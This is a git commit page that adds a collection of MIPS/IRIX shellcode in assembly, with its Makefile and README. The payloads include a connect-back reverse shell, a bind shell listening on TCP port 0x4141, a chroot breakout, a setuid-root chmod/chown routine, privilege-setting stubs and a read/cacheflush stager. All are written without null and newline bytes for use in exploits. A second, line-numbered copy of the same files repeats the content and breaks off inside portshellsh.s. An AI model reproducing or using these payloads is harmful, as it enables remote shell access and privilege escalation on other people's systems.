initial

author: Root THC 2026-02-24 12:42:47 +0000
committer: Root THC 2026-02-24 12:42:47 +0000
commit: c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree: aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/mips_irix
parent: 073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
11 files changed, 569 insertions, 0 deletions
diff --git a/other/shellkit/mips_irix/Makefile b/other/shellkit/mips_irix/Makefile
new file mode 100644
index 0000000..a68d231
--- /dev/null
+++ b/other/shellkit/mips_irix/Makefile
@@ -0,0 +1,22 @@
+#DFLAGS=-O2
+DFLAGS=-g -ggdb
+CC=gcc
+CFLAGS=$(DFLAGS) -Wall -DIRIX
+all:
+        $(CC) $(CFLAGS) -o chmod ../codedump.c chmod.s
+        $(CC) $(CFLAGS) -o chroot ../codedump.c chroot.s
+        $(CC) $(CFLAGS) -o connectsh ../codedump.c connectsh.s
+        $(CC) $(CFLAGS) -o execvesh ../codedump.c execvesh.s
+        $(CC) $(CFLAGS) -o exit ../codedump.c exit.s
+        $(CC) $(CFLAGS) -o portshellsh ../codedump.c portshellsh.s
+        $(CC) $(CFLAGS) -o read ../codedump.c read.s
+        $(CC) $(CFLAGS) -o setgid ../codedump.c setgid.s
+        $(CC) $(CFLAGS) -o setreuid ../codedump.c setreuid.s
+clean:
+        rm -f code.h codetest \
+                chmod chroot connectsh execvesh exit portshellsh read \
+                setgid setreuid
diff --git a/other/shellkit/mips_irix/README b/other/shellkit/mips_irix/README
new file mode 100644
index 0000000..a78c668
--- /dev/null
+++ b/other/shellkit/mips_irix/README
@@ -0,0 +1,25 @@
+mips/irix shellcodes
+some comments in this file
+for execvesh and portshellsh append "/bin/sh\x42" to the code.
+if you want to execute something different than "/bin/sh", be sure to properly
+set the first four bytes to a valid opcode ("/bin" is valid) or insert a nop
+and adjust the self-relocation.
+the codedump utility build extra cache control syscalls, so it flushes all
+caches properly and you can run the code safily then from a flushed cache.
+example:
+scut@hyperion $ make >/dev/null
+scut@hyperion $ ./execvesh
+  <... dumps the hexcode ...>
+scut@hyperion $ ./execvesh exec
+len = 68
+$
+$ exit
+scut@hyperion $
diff --git a/other/shellkit/mips_irix/chmod.s b/other/shellkit/mips_irix/chmod.s
new file mode 100644
index 0000000..181c123
--- /dev/null
+++ b/other/shellkit/mips_irix/chmod.s
@@ -0,0 +1,49 @@
+/* MIPS/IRIX PIC chmod code
+ *
+ * -sc.
+ */
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+        .section .text
+        .globl  cbegin
+        .globl  cend
+        /* FIXME: its not workable atm */
+cbegin:
+        .set    noreorder
+        .set    nomacro
+lbl:    bltzal  zero, lbl
+        li      a1, 0x4141      /* a1 = uid ^ 0x5555 */
+        xor     a1, a1, 0x5555
+        li      a2, 0x4242      /* a2 = gid ^ 0x5555 */
+        xor     a2, a2, 0x555
+        addu    a0, ra, 0x0180
+        sb      zero, -(0x0148 + -(9))(a0)
+        subu    a0, a0, 0x0148
+        /* chown (a0 = pathname, a1 = uid, a2 = gid) */
+        li      v0, SYS_chown   /* 0x03f8 */
+        syscall
+        /* chmod (a0 = pathname, a1 = 04755) */
+        li      a1, 0x09ed      /* a1 = 04755 = 0x09ed */
+        li      v0, SYS_chmod   /* 0x03f7 */
+        syscall
+        li      v0, SYS_exit    /* 0x03e9 */
+        syscall
+        li      t8, 0x72ec      /* sane ds */
+        .end    cbegin
+cend:
+        /* XXX: append pathname here, will get NUL terminated */
diff --git a/other/shellkit/mips_irix/chroot.s b/other/shellkit/mips_irix/chroot.s
new file mode 100644
index 0000000..96a1595
--- /dev/null
+++ b/other/shellkit/mips_irix/chroot.s
@@ -0,0 +1,60 @@
+/* MIPS/IRIX PIC chroot break
+ * without 0x00, 0x0a, 0x0d, 0x25
+ *
+ * -sc.
+ */
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+        .section .text
+        .globl  cbegin
+        .globl  cend
+cbegin:
+        .set    noreorder
+        .set    nomacro
+foo:    bltzal  zero, foo
+        li      a1, 0700        /* a1 = 0700 permission */
+        /* mkdir ("Y..", 0700);
+         */
+        lui     t2, 0x592e
+        ori     t2, 0x2cff      /* t1 = "Y..\x00" */
+        add     t2, t2, 0x0101
+        sw      t2, -48(ra)
+        subu    a0, ra, 48      /* a0 = "Y.." */
+        li      v0, SYS_mkdir   /* 0x0438 */
+        syscall
+        /* chroot ("Y..");
+         * a0 still points to it
+         */
+        addu    v0, a1, (SYS_chroot - 0700)     /* v0 = SYS_chroot (0x0425) */
+        syscall
+        /* chdir ("..") a few times
+         */
+        li      s2, 0x1211      /* 12 times chdir ("..") */
+foo2:   subu    a0, ra, 47      /* "..\x00" */
+        li      v0, SYS_chdir   /* 0x03f4 */
+        syscall
+        sub     s2, 0x0101
+        bgez    s2, foo2
+        addu    v0, s2, 0x0426  /* bds: SYS_chroot (0x0425) + 1 */
+        subu    a0, ra, 46      /* ".\x00" */
+        syscall
+        li      t2, 0x7350      /* NOP */
+        .end    cbegin
+cend:
+        nop
diff --git a/other/shellkit/mips_irix/connectsh.s b/other/shellkit/mips_irix/connectsh.s
new file mode 100644
index 0000000..7b77d4e
--- /dev/null
+++ b/other/shellkit/mips_irix/connectsh.s
@@ -0,0 +1,109 @@
+/* MIPS/IRIX PIC connect shell shellcode
+ * no 0x00, 0x0a, 0x0d, 0x25 bytes
+ *
+ * -sc
+ */
+        /* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+#include <elf.h>
+        .section .text
+        .globl  cbegin
+        .globl  cend
+cbegin:
+        .set    noreorder
+        .set    nomacro
+        /* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)
+         */
+        li      s6, 0x7350
+        subu    a0, s6, 0x734e  /* AF_INET = 2 */
+        subu    a1, s6, 0x734e  /* SOCK_STREAM = 2 */
+        subu    a2, s6, 0x734a  /* IPPROTO_TCP = 6 */
+        li      v0, SYS_socket  /* 0x0453 */
+        syscall
+        /* socket returned in v0, save to a0
+         */
+        andi    a0, v0, 0xffff          /* a0 = socket */
+        /* build struct sockaddr_in
+         * 0x0002port 0x_IP-addr_ 0x00000000 0x00000000
+         */
+        subu    t2, s6, 0x734e          /* t2 = 0x0002 */
+        sh      t2, -16(sp)
+        li      t2, 0x4141              /* t2 = port number */
+        sh      t2, -14(sp)
+        /* ip address */
+        lui     t2, 0x4142
+        ori     t2, t2, 0x4344
+        sw      t2, -12(sp)
+        sw      zero, -8(sp)
+        sw      zero, -4(sp)
+        /* connect (socket, (struct sockaddr *) cs,
+         *      sizeof (struct sockaddr_in)
+         */
+        subu    a2, s6, 0x7340  /* a2 = sizeof (struct sockaddr_in) = 0x10 */
+        subu    a1, sp, a2      /* a1 = (struct sockaddr *) */
+        li      v0, SYS_connect /* 0x0443 */
+        syscall
+        /* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2)
+         */
+        subu    s3, s6, 0x431e  /* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */
+        /* socket returned in v0, save in s7
+         */
+        andi    s7, a0, 0xffff
+        /* dup is emulated through close and fcntl, since irix offers no
+         * native dup syscall as for example linux. see phrack 56 for details
+         */
+dup_loop:
+        andi    a0, s3, 0x0103  /* a0 = STD*_FILENO */
+        li      v0, SYS_close   /* 0x03ee */
+        syscall
+        andi    a0, s7, 0xffff  /* a0 = socket */
+        slti    a1, zero, -1    /* a1 = 0 */
+        andi    a2, s3, 0x0103  /* a2 = STD*_FILENO */
+        li      v0, SYS_fcntl   /* 0x0426 */
+        syscall
+        subu    s3, 0x1011
+        bgez    s3, dup_loop
+        /* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL)
+         */
+        sw      zero, -4(sp)
+        /* a2 (envp) is already zero due to the dup_loop
+         */
+gaddr:  bltzal  zero, gaddr     /* rock on-. lsd */
+        subu    a1, sp, 8
+        /* ra contains the proper address now */
+        addu    ra, ra, 0x0120  /* add 32 + 0x0100 */
+        add     a0, ra, -(8 + 0x100)
+        sb      zero, -(1 + 0x100)(ra)  /* store NUL */
+        sw      a0, -8(sp)
+        li      v0, SYS_execve
+        syscall
+        .end    cbegin
+cend:
+        /* XXX append here: "/bin/sh\x42" */
diff --git a/other/shellkit/mips_irix/execvesh.s b/other/shellkit/mips_irix/execvesh.s
new file mode 100644
index 0000000..89fd45b
--- /dev/null
+++ b/other/shellkit/mips_irix/execvesh.s
@@ -0,0 +1,36 @@
+/* MIPS/IRIX PIC execve code
+ *
+ * -sc.
+ */
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+        .section .text
+        .globl  cbegin
+        .globl  cend
+cbegin:
+        .set    noreorder
+        .set    nomacro
+        sw      zero, -4(sp)
+foo:    bltzal  zero, foo
+        lw      a2, -4(sp)
+        addu    ra, ra, 0x0124  /* add 36 + 0x0100 */
+        add     a0, ra, -(8 + 0x100)
+        sb      zero, -(1 + 0x100)(ra)
+        sw      a0, -8(sp)
+        subu    a1, sp, 8
+        li      v0, SYS_execve
+        syscall
+        .end    cbegin
+cend:
diff --git a/other/shellkit/mips_irix/exit.s b/other/shellkit/mips_irix/exit.s
new file mode 100644
index 0000000..aef7d01
--- /dev/null
+++ b/other/shellkit/mips_irix/exit.s
@@ -0,0 +1,29 @@
+/* MIPS/IRIX PIC exit code
+ *
+ * -sc.
+ */
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+        .section .text
+        .globl  cbegin
+        .globl  cend
+cbegin:
+        .set    noreorder
+        .set    nomacro
+        /* _exit (0) */
+        slti    a0, zero, -1
+        li      v0, SYS_exit    /* 0x03e9 */
+        syscall
+        li      t8, 0x7350
+        .end    cbegin
+cend:
diff --git a/other/shellkit/mips_irix/portshellsh.s b/other/shellkit/mips_irix/portshellsh.s
new file mode 100644
index 0000000..18070f6
--- /dev/null
+++ b/other/shellkit/mips_irix/portshellsh.s
@@ -0,0 +1,126 @@
+/* MIPS/IRIX PIC listening port shellcode
+ * no 0x00, 0x0a, 0x0d, 0x25 bytes
+ *
+ * bind a shell to tcp port 0x4141
+ *
+ * 2001/05/25 optimized from 368 down to 188 bytes -sc.
+ *
+ */
+        /* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+#include <elf.h>
+        .section .text
+        .globl  cbegin
+        .globl  cend
+cbegin:
+        .set    noreorder
+        .set    nomacro
+        /* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)
+         */
+        li      s6, 0x7350
+        subu    a0, s6, 0x734e  /* AF_INET = 2 */
+        subu    a1, s6, 0x734e  /* SOCK_STREAM = 2 */
+        subu    a2, s6, 0x734a  /* IPPROTO_TCP = 6 */
+        li      v0, SYS_socket  /* 0x0453 */
+        syscall
+        /* socket returned in v0, save to a0
+         */
+        andi    a0, v0, 0xffff          /* a0 = socket */
+        /* build struct sockaddr_in
+         * 0x0002port 0x00000000 0x00000000 0x00000000
+         */
+        subu    t2, s6, 0x734e          /* t2 = 0x0002 */
+        sh      t2, -16(sp)
+        li      t2, 0x4141              /* t2 = port number */
+        sh      t2, -14(sp)
+        sw      zero, -12(sp)
+        sw      zero, -8(sp)
+        sw      zero, -4(sp)
+        /* bind (socket, (struct sockaddr *) srv_addr,
+         *      sizeof (struct sockaddr_in)
+         */
+        subu    a2, s6, 0x7340  /* a2 = sizeof (struct sockaddr_in) = 0x10 */
+        subu    a1, sp, a2      /* a1 = (struct sockaddr *) */
+        li      v0, SYS_bind    /* 0x0442 */
+        syscall
+        /* listen (socket, backlog)
+         * XXX: is it safe here to make backlog = pointer-on-the-stack ?
+         *      should be, since its still a positive number
+         */
+/*      subu    a1, s6, 0x7340  *//* a1 = backlog = 0x10 */
+        li      v0, SYS_listen  /* 0x0448 */
+        syscall
+        /* accept (socket, (struct sockaddr *) cl_addr,
+         *      &socklen)
+         * XXX: a1 is still the pointer to the sockaddr struct
+         * a2 should be 0x10 still
+         */
+        sw      a2, -20(sp)
+        subu    a2, sp, 20      /* a2 = &socklen */
+        li      v0, SYS_accept  /* 0x0441 */
+        syscall
+        /* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2)
+         */
+        subu    s3, s6, 0x431e  /* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */
+        /* socket returned in v0, save in s7
+         */
+        andi    s7, v0, 0xffff
+        /* dup is emulated through close and fcntl, since irix offers no
+         * native dup syscall as for example linux. see phrack 56 for details
+         */
+dup_loop:
+        andi    a0, s3, 0x0103  /* a0 = STD*_FILENO */
+        li      v0, SYS_close   /* 0x03ee */
+        syscall
+        andi    a0, s7, 0xffff  /* a0 = socket */
+        slti    a1, zero, -1    /* a1 = 0 */
+        andi    a2, s3, 0x0103  /* a2 = STD*_FILENO */
+        li      v0, SYS_fcntl   /* 0x0426 */
+        syscall
+        subu    s3, 0x1011
+        bgez    s3, dup_loop
+        /* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL)
+         */
+        sw      zero, -4(sp)
+        /* a2 (envp) is already zero due to the dup_loop
+         */
+gaddr:  bltzal  zero, gaddr     /* rock on-. lsd */
+        subu    a1, sp, 8
+        /* ra contains the proper address now */
+        addu    ra, ra, 0x0120  /* add 32 + 0x0100 */
+        add     a0, ra, -(8 + 0x100)
+        sb      zero, -(1 + 0x100)(ra)  /* store NUL */
+        sw      a0, -8(sp)
+        li      v0, SYS_execve
+        syscall
+        .end    cbegin
+cend:
+        /* XXX append here: "/bin/sh\x42" */
diff --git a/other/shellkit/mips_irix/read.s b/other/shellkit/mips_irix/read.s
new file mode 100644
index 0000000..90ab25d
--- /dev/null
+++ b/other/shellkit/mips_irix/read.s
@@ -0,0 +1,51 @@
+/* MIPS/IRIX PIC read/cacheflush code
+ *
+ * -sc.
+ *
+ * some note:
+ * since the data that is read in is treated in the data cache, you may
+ * experience a data/instruction cache incoherence, where the instruction
+ * cache still contains the old memory contents. to avoid this, send a lot
+ * of data, first the shellcode and then a huge bogus space of nops, which
+ * are to flush the data cache, later making the instruction cache populated
+ * with the real shellcode. or do it as we do it here, use a cacheflush
+ * syscall. this is only possible if this code is already in icache, so for
+ * the usual exploitation situation that does not help much.
+ */
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+        .section .text
+        .globl  cbegin
+        .globl  cend
+cbegin:
+        .set    noreorder
+        .set    nomacro
+foo:    bltzal  zero, foo
+        slti    a0, zero, -1
+        addu    ra, ra, (0x0101 + 48)
+        subu    a1, ra, 0x0101
+        li      a2, 0x1010      /* read 0x1010 bytes max */
+        li      v0, SYS_read
+        syscall
+        subu    a0, ra, 0x0101  /* data was read to here */
+        li      a1, 0x1010      /* should be cacheline aligned */
+        li      t2, -4
+        not     a2, t2          /* BCACHE = 0x03 */
+        li      v0, SYS_cachectl        /* 0x047e */
+        syscall
+        li      t8, 0x7350      /* has to be a sane bds */
+        .end    cbegin
+cend:
diff --git a/other/shellkit/mips_irix/setgid.s b/other/shellkit/mips_irix/setgid.s
new file mode 100644
index 0000000..3223892
--- /dev/null
+++ b/other/shellkit/mips_irix/setgid.s
@@ -0,0 +1,30 @@
+/* MIPS/IRIX PIC setgid chainable code
+ *
+ * -sc.
+ */
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+        .section .text
+        .globl  cbegin
+        .globl  cend
+cbegin:
+        .set    noreorder
+        .set    nomacro
+        /* setgid (a0) */
+        li      a0, 0x4141      /* gid ^ 0x5555 */
+        xor     a0, a0, 0x5555
+        li      v0, SYS_setgid  /* 0x0416 */
+        syscall
+        li      t8, 0x7350
+        .end    cbegin
+cend:
diff --git a/other/shellkit/mips_irix/setreuid.s b/other/shellkit/mips_irix/setreuid.s
new file mode 100644
index 0000000..9578262
--- /dev/null
+++ b/other/shellkit/mips_irix/setreuid.s
@@ -0,0 +1,32 @@
+/* MIPS/IRIX PIC setreuid chainable code
+ *
+ * -sc.
+ */
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+        .section .text
+        .globl  cbegin
+        .globl  cend
+cbegin:
+        .set    noreorder
+        .set    nomacro
+        /* setreuid (a0, a1) */
+        li      a0, 0x4141              /* ruid ^ 0x5555 */
+        li      a1, 0x4242              /* euid ^ 0x5555 */
+        xor     a0, a0, 0x5555
+        xor     a1, a1, 0x5555
+        li      v0, SYS_setreuid        /* 0x0464 */
+        syscall
+        li      t8, 0x7350
+        .end    cbegin
+cend:
author	Root THC	2026-02-24 12:42:47 +0000
committer	Root THC	2026-02-24 12:42:47 +0000
commit	c9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
tree	aefc355416b561111819de159ccbd86c3004cf88 /other/shellkit/mips_irix
parent	073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)

diff --git a/other/shellkit/mips_irix/Makefile b/other/shellkit/mips_irix/Makefile new file mode 100644 index 0000000..a68d231 --- /dev/null +++ b/other/shellkit/mips_irix/Makefile
@@ -0,0 +1,22 @@
	1
	2	#DFLAGS=-O2
	3	DFLAGS=-g -ggdb
	4	CC=gcc
	5	CFLAGS=$(DFLAGS) -Wall -DIRIX
	6
	7	all:
	8	$(CC) $(CFLAGS) -o chmod ../codedump.c chmod.s
	9	$(CC) $(CFLAGS) -o chroot ../codedump.c chroot.s
	10	$(CC) $(CFLAGS) -o connectsh ../codedump.c connectsh.s
	11	$(CC) $(CFLAGS) -o execvesh ../codedump.c execvesh.s
	12	$(CC) $(CFLAGS) -o exit ../codedump.c exit.s
	13	$(CC) $(CFLAGS) -o portshellsh ../codedump.c portshellsh.s
	14	$(CC) $(CFLAGS) -o read ../codedump.c read.s
	15	$(CC) $(CFLAGS) -o setgid ../codedump.c setgid.s
	16	$(CC) $(CFLAGS) -o setreuid ../codedump.c setreuid.s
	17
	18	clean:
	19	rm -f code.h codetest \
	20	chmod chroot connectsh execvesh exit portshellsh read \
	21	setgid setreuid
	22


diff --git a/other/shellkit/mips_irix/README b/other/shellkit/mips_irix/README new file mode 100644 index 0000000..a78c668 --- /dev/null +++ b/other/shellkit/mips_irix/README
@@ -0,0 +1,25 @@
	1
	2	mips/irix shellcodes
	3	some comments in this file
	4
	5
	6	for execvesh and portshellsh append "/bin/sh\x42" to the code.
	7
	8	if you want to execute something different than "/bin/sh", be sure to properly
	9	set the first four bytes to a valid opcode ("/bin" is valid) or insert a nop
	10	and adjust the self-relocation.
	11
	12	the codedump utility build extra cache control syscalls, so it flushes all
	13	caches properly and you can run the code safily then from a flushed cache.
	14
	15	example:
	16
	17	scut@hyperion $ make >/dev/null
	18	scut@hyperion $ ./execvesh
	19	<... dumps the hexcode ...>
	20	scut@hyperion $ ./execvesh exec
	21	len = 68
	22	$
	23	$ exit
	24	scut@hyperion $
	25


diff --git a/other/shellkit/mips_irix/chmod.s b/other/shellkit/mips_irix/chmod.s new file mode 100644 index 0000000..181c123 --- /dev/null +++ b/other/shellkit/mips_irix/chmod.s
@@ -0,0 +1,49 @@
	1	/* MIPS/IRIX PIC chmod code
	2	*
	3	* -sc.
	4	*/
	5
	6	#include <sgidefs.h>
	7	#include <sys/regdef.h>
	8	#include <sys/asm.h>
	9	#include <sys.s>
	10	#include <sys/syscall.h>
	11
	12	.section .text
	13
	14	.globl cbegin
	15	.globl cend
	16
	17	/* FIXME: its not workable atm */
	18	cbegin:
	19	.set noreorder
	20	.set nomacro
	21
	22	lbl: bltzal zero, lbl
	23
	24	li a1, 0x4141 /* a1 = uid ^ 0x5555 */
	25	xor a1, a1, 0x5555
	26	li a2, 0x4242 /* a2 = gid ^ 0x5555 */
	27	xor a2, a2, 0x555
	28
	29	addu a0, ra, 0x0180
	30	sb zero, -(0x0148 + -(9))(a0)
	31	subu a0, a0, 0x0148
	32
	33	/* chown (a0 = pathname, a1 = uid, a2 = gid) */
	34	li v0, SYS_chown /* 0x03f8 */
	35	syscall
	36
	37	/* chmod (a0 = pathname, a1 = 04755) */
	38	li a1, 0x09ed /* a1 = 04755 = 0x09ed */
	39	li v0, SYS_chmod /* 0x03f7 */
	40	syscall
	41
	42	li v0, SYS_exit /* 0x03e9 */
	43	syscall
	44	li t8, 0x72ec /* sane ds */
	45
	46	.end cbegin
	47	cend:
	48
	49	/* XXX: append pathname here, will get NUL terminated */


diff --git a/other/shellkit/mips_irix/chroot.s b/other/shellkit/mips_irix/chroot.s new file mode 100644 index 0000000..96a1595 --- /dev/null +++ b/other/shellkit/mips_irix/chroot.s
@@ -0,0 +1,60 @@
	1	/* MIPS/IRIX PIC chroot break
	2	* without 0x00, 0x0a, 0x0d, 0x25
	3	*
	4	* -sc.
	5	*/
	6
	7	#include <sgidefs.h>
	8	#include <sys/regdef.h>
	9	#include <sys/asm.h>
	10	#include <sys.s>
	11	#include <sys/syscall.h>
	12
	13	.section .text
	14
	15	.globl cbegin
	16	.globl cend
	17
	18	cbegin:
	19	.set noreorder
	20	.set nomacro
	21
	22	foo: bltzal zero, foo
	23	li a1, 0700 /* a1 = 0700 permission */
	24
	25	/* mkdir ("Y..", 0700);
	26	*/
	27	lui t2, 0x592e
	28	ori t2, 0x2cff /* t1 = "Y..\x00" */
	29	add t2, t2, 0x0101
	30	sw t2, -48(ra)
	31
	32	subu a0, ra, 48 /* a0 = "Y.." */
	33	li v0, SYS_mkdir /* 0x0438 */
	34	syscall
	35
	36	/* chroot ("Y..");
	37	* a0 still points to it
	38	*/
	39	addu v0, a1, (SYS_chroot - 0700) /* v0 = SYS_chroot (0x0425) */
	40	syscall
	41
	42	/* chdir ("..") a few times
	43	*/
	44	li s2, 0x1211 /* 12 times chdir ("..") */
	45
	46	foo2: subu a0, ra, 47 /* "..\x00" */
	47	li v0, SYS_chdir /* 0x03f4 */
	48	syscall
	49	sub s2, 0x0101
	50	bgez s2, foo2
	51
	52	addu v0, s2, 0x0426 /* bds: SYS_chroot (0x0425) + 1 */
	53	subu a0, ra, 46 /* ".\x00" */
	54	syscall
	55	li t2, 0x7350 /* NOP */
	56
	57	.end cbegin
	58	cend:
	59	nop
	60


diff --git a/other/shellkit/mips_irix/connectsh.s b/other/shellkit/mips_irix/connectsh.s new file mode 100644 index 0000000..7b77d4e --- /dev/null +++ b/other/shellkit/mips_irix/connectsh.s
@@ -0,0 +1,109 @@
	1	/* MIPS/IRIX PIC connect shell shellcode
	2	* no 0x00, 0x0a, 0x0d, 0x25 bytes
	3	*
	4	* -sc
	5	*/
	6
	7	/* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */
	8
	9	#include <sgidefs.h>
	10	#include <sys/regdef.h>
	11	#include <sys/asm.h>
	12	#include <sys.s>
	13	#include <sys/syscall.h>
	14	#include <elf.h>
	15
	16	.section .text
	17
	18	.globl cbegin
	19	.globl cend
	20
	21	cbegin:
	22	.set noreorder
	23	.set nomacro
	24
	25	/* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)
	26	*/
	27	li s6, 0x7350
	28	subu a0, s6, 0x734e /* AF_INET = 2 */
	29	subu a1, s6, 0x734e /* SOCK_STREAM = 2 */
	30	subu a2, s6, 0x734a /* IPPROTO_TCP = 6 */
	31	li v0, SYS_socket /* 0x0453 */
	32	syscall
	33
	34	/* socket returned in v0, save to a0
	35	*/
	36	andi a0, v0, 0xffff /* a0 = socket */
	37
	38	/* build struct sockaddr_in
	39	* 0x0002port 0x_IP-addr_ 0x00000000 0x00000000
	40	*/
	41	subu t2, s6, 0x734e /* t2 = 0x0002 */
	42	sh t2, -16(sp)
	43	li t2, 0x4141 /* t2 = port number */
	44	sh t2, -14(sp)
	45
	46	/* ip address */
	47	lui t2, 0x4142
	48	ori t2, t2, 0x4344
	49	sw t2, -12(sp)
	50
	51	sw zero, -8(sp)
	52	sw zero, -4(sp)
	53
	54	/* connect (socket, (struct sockaddr *) cs,
	55	* sizeof (struct sockaddr_in)
	56	*/
	57	subu a2, s6, 0x7340 /* a2 = sizeof (struct sockaddr_in) = 0x10 */
	58	subu a1, sp, a2 /* a1 = (struct sockaddr ) /
	59	li v0, SYS_connect /* 0x0443 */
	60	syscall
	61
	62	/* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2)
	63	*/
	64	subu s3, s6, 0x431e /* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */
	65
	66	/* socket returned in v0, save in s7
	67	*/
	68	andi s7, a0, 0xffff
	69
	70	/* dup is emulated through close and fcntl, since irix offers no
	71	* native dup syscall as for example linux. see phrack 56 for details
	72	*/
	73	dup_loop:
	74	andi a0, s3, 0x0103 /* a0 = STD_FILENO /
	75	li v0, SYS_close /* 0x03ee */
	76	syscall
	77
	78	andi a0, s7, 0xffff /* a0 = socket */
	79	slti a1, zero, -1 /* a1 = 0 */
	80	andi a2, s3, 0x0103 /* a2 = STD_FILENO /
	81	li v0, SYS_fcntl /* 0x0426 */
	82	syscall
	83
	84	subu s3, 0x1011
	85	bgez s3, dup_loop
	86
	87	/* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL)
	88	*/
	89	sw zero, -4(sp)
	90
	91	/* a2 (envp) is already zero due to the dup_loop
	92	*/
	93	gaddr: bltzal zero, gaddr /* rock on-. lsd */
	94	subu a1, sp, 8
	95
	96	/* ra contains the proper address now */
	97	addu ra, ra, 0x0120 /* add 32 + 0x0100 */
	98
	99	add a0, ra, -(8 + 0x100)
	100	sb zero, -(1 + 0x100)(ra) /* store NUL */
	101	sw a0, -8(sp)
	102	li v0, SYS_execve
	103	syscall
	104
	105	.end cbegin
	106	cend:
	107
	108	/* XXX append here: "/bin/sh\x42" */
	109


diff --git a/other/shellkit/mips_irix/execvesh.s b/other/shellkit/mips_irix/execvesh.s new file mode 100644 index 0000000..89fd45b --- /dev/null +++ b/other/shellkit/mips_irix/execvesh.s
@@ -0,0 +1,36 @@
	1	/* MIPS/IRIX PIC execve code
	2	*
	3	* -sc.
	4	*/
	5
	6	#include <sgidefs.h>
	7	#include <sys/regdef.h>
	8	#include <sys/asm.h>
	9	#include <sys.s>
	10	#include <sys/syscall.h>
	11
	12	.section .text
	13
	14	.globl cbegin
	15	.globl cend
	16
	17	cbegin:
	18	.set noreorder
	19	.set nomacro
	20
	21	sw zero, -4(sp)
	22	foo: bltzal zero, foo
	23	lw a2, -4(sp)
	24
	25	addu ra, ra, 0x0124 /* add 36 + 0x0100 */
	26
	27	add a0, ra, -(8 + 0x100)
	28	sb zero, -(1 + 0x100)(ra)
	29	sw a0, -8(sp)
	30	subu a1, sp, 8
	31	li v0, SYS_execve
	32	syscall
	33
	34	.end cbegin
	35	cend:
	36


diff --git a/other/shellkit/mips_irix/exit.s b/other/shellkit/mips_irix/exit.s new file mode 100644 index 0000000..aef7d01 --- /dev/null +++ b/other/shellkit/mips_irix/exit.s
@@ -0,0 +1,29 @@
	1	/* MIPS/IRIX PIC exit code
	2	*
	3	* -sc.
	4	*/
	5
	6	#include <sgidefs.h>
	7	#include <sys/regdef.h>
	8	#include <sys/asm.h>
	9	#include <sys.s>
	10	#include <sys/syscall.h>
	11
	12	.section .text
	13
	14	.globl cbegin
	15	.globl cend
	16
	17	cbegin:
	18	.set noreorder
	19	.set nomacro
	20
	21	/* _exit (0) */
	22	slti a0, zero, -1
	23	li v0, SYS_exit /* 0x03e9 */
	24	syscall
	25	li t8, 0x7350
	26
	27	.end cbegin
	28	cend:
	29


diff --git a/other/shellkit/mips_irix/portshellsh.s b/other/shellkit/mips_irix/portshellsh.s new file mode 100644 index 0000000..18070f6 --- /dev/null +++ b/other/shellkit/mips_irix/portshellsh.s
@@ -0,0 +1,126 @@
	1	/* MIPS/IRIX PIC listening port shellcode
	2	* no 0x00, 0x0a, 0x0d, 0x25 bytes
	3	*
	4	* bind a shell to tcp port 0x4141
	5	*
	6	* 2001/05/25 optimized from 368 down to 188 bytes -sc.
	7	*
	8	*/
	9
	10	/* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */
	11
	12	#include <sgidefs.h>
	13	#include <sys/regdef.h>
	14	#include <sys/asm.h>
	15	#include <sys.s>
	16	#include <sys/syscall.h>
	17	#include <elf.h>
	18
	19	.section .text
	20
	21	.globl cbegin
	22	.globl cend
	23
	24	cbegin:
	25	.set noreorder
	26	.set nomacro
	27
	28	/* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)
	29	*/
	30	li s6, 0x7350
	31	subu a0, s6, 0x734e /* AF_INET = 2 */
	32	subu a1, s6, 0x734e /* SOCK_STREAM = 2 */
	33	subu a2, s6, 0x734a /* IPPROTO_TCP = 6 */
	34	li v0, SYS_socket /* 0x0453 */
	35	syscall
	36
	37	/* socket returned in v0, save to a0
	38	*/
	39	andi a0, v0, 0xffff /* a0 = socket */
	40
	41	/* build struct sockaddr_in
	42	* 0x0002port 0x00000000 0x00000000 0x00000000
	43	*/
	44	subu t2, s6, 0x734e /* t2 = 0x0002 */
	45	sh t2, -16(sp)
	46	li t2, 0x4141 /* t2 = port number */
	47	sh t2, -14(sp)
	48	sw zero, -12(sp)
	49	sw zero, -8(sp)
	50	sw zero, -4(sp)
	51
	52	/* bind (socket, (struct sockaddr *) srv_addr,
	53	* sizeof (struct sockaddr_in)
	54	*/
